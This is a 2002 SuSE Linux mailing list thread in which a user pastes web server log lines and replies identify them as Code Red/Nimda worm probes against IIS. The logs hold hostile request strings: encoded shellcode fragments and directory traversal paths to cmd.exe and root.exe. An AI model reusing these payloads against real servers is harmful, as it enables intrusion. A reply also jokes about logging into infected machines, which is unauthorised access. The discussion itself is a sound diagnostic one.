This is code red or one of its variants. Since you aren't running Microsoft IIS you are immune to it. Ewan On Fri, 2002-03-15 at 15:13, Robert Sweet wrote:
On Wed, Mar 13, 2002 at 09:13:02PM +0100, Jon Clausen beat on the keyboard:
On Wednesday 13 March 2002 13:44, Landy Roman wrote:
BTW nobody commented on these?
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u 0000%u00=a HTTP/1.0" 400 331 64.133.27.115 - - [12/Mar/2002:10:23:19 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt /system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - -
How's this? (Yet another Attempt at Reproducing Anders' mail problem)
-- To unsubscribe send e-mail to suse-linux-e-unsubscribe@suse.com For additional commands send e-mail to suse-linux-e-help@suse.com Also check the FAQ at http://www.suse.com/support/faq and the archives at http://lists.suse.com That is someone infected with virus. If you use a smbclient you can log onto the machine 50% percent of the time :)
-- _ _ __ _____ _____ ___| |_ | '__| / __\ \ /\ / / _ \/ _ \ __| -o) | | _ \__ \\ V V / __/ __/ |_ /\\ |_|(_) |___/ \_/\_/ \___|\___|\__|_\_v rsweet@garagenetworks.net "unix soit qui mal y pense."
-- To unsubscribe send e-mail to suse-linux-e-unsubscribe@suse.com For additional commands send e-mail to suse-linux-e-help@suse.com Also check the FAQ at http://www.suse.com/support/faq and the archives at http://lists.suse.com